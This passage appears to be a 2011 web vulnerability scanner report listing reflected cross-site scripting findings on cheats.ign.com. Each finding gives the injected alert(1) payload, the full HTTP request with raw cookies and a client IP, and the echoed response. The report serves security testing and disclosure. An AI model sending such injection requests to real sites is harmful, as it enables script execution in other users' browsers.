GET /?778c0"-alert(1)-"0daba286c40=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 00:58:52 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c07-32465-2017572462-4;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 00:58:52 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297040332605v-1n-12mc+1297040332605mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 568696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
<script>
   if(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://cheats.ign.com/?778c0"-alert(1)-"0daba286c40=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.80. http://cheats.ign.com/index/cheats/index.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /index/cheats/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff66c"><script>alert(1)</script>3b17bfe17cb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/cheats/index.html?ff66c"><script>alert(1)</script>3b17bfe17cb=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:05 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 138790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://cheats.ign.com/index/cheats/index.html?ff66c"><script>alert(1)</script>3b17bfe17cb=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.81. http://cheats.ign.com/index/cheats/index.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /index/cheats/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ace91"-alert(1)-"91fa5ed4333 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/cheats/index.html?ace91"-alert(1)-"91fa5ed4333=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:10 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 138731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
omscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://cheats.ign.com/index/cheats/index.html?ace91"-alert(1)-"91fa5ed4333=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.82. http://cheats.ign.com/index/nintendo-ds-cheats/index.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /index/nintendo-ds-cheats/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9af17"><script>alert(1)</script>af6bcff7071 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/nintendo-ds-cheats/index.html?9af17"><script>alert(1)</script>af6bcff7071=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:03 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 127678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://cheats.ign.com/index/nintendo-ds-cheats/index.html?9af17"><script>alert(1)</script>af6bcff7071=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.83. http://cheats.ign.com/index/nintendo-ds-cheats/index.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /index/nintendo-ds-cheats/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0fc8"-alert(1)-"3c528f0452e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/nintendo-ds-cheats/index.html?c0fc8"-alert(1)-"3c528f0452e=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:06 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 127618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
== 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://cheats.ign.com/index/nintendo-ds-cheats/index.html?c0fc8"-alert(1)-"3c528f0452e=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.84. http://cheats.ign.com/index/pc-cheats/index.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /index/pc-cheats/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b25b"-alert(1)-"859129d34f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/pc-cheats/index.html?8b25b"-alert(1)-"859129d34f=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:00 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 140541

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
coreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://cheats.ign.com/index/pc-cheats/index.html?8b25b"-alert(1)-"859129d34f=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.85. http://cheats.ign.com/index/pc-cheats/index.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /index/pc-cheats/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b1c2"><script>alert(1)</script>acb3df6b5fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/pc-cheats/index.html?6b1c2"><script>alert(1)</script>acb3df6b5fc=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:12:58 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 140604

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://cheats.ign.com/index/pc-cheats/index.html?6b1c2"><script>alert(1)</script>acb3df6b5fc=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.86. http://cheats.ign.com/index/playstation-3-cheats/index.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /index/playstation-3-cheats/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c6ff"><script>alert(1)</script>9b70942b9ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/playstation-3-cheats/index.html?9c6ff"><script>alert(1)</script>9b70942b9ae=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:01 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 145661

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://cheats.ign.com/index/playstation-3-cheats/index.html?9c6ff"><script>alert(1)</script>9b70942b9ae=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.87. http://cheats.ign.com/index/playstation-3-cheats/index.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /index/playstation-3-cheats/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fc63"-alert(1)-"d1160877f7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/playstation-3-cheats/index.html?5fc63"-alert(1)-"d1160877f7c=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; 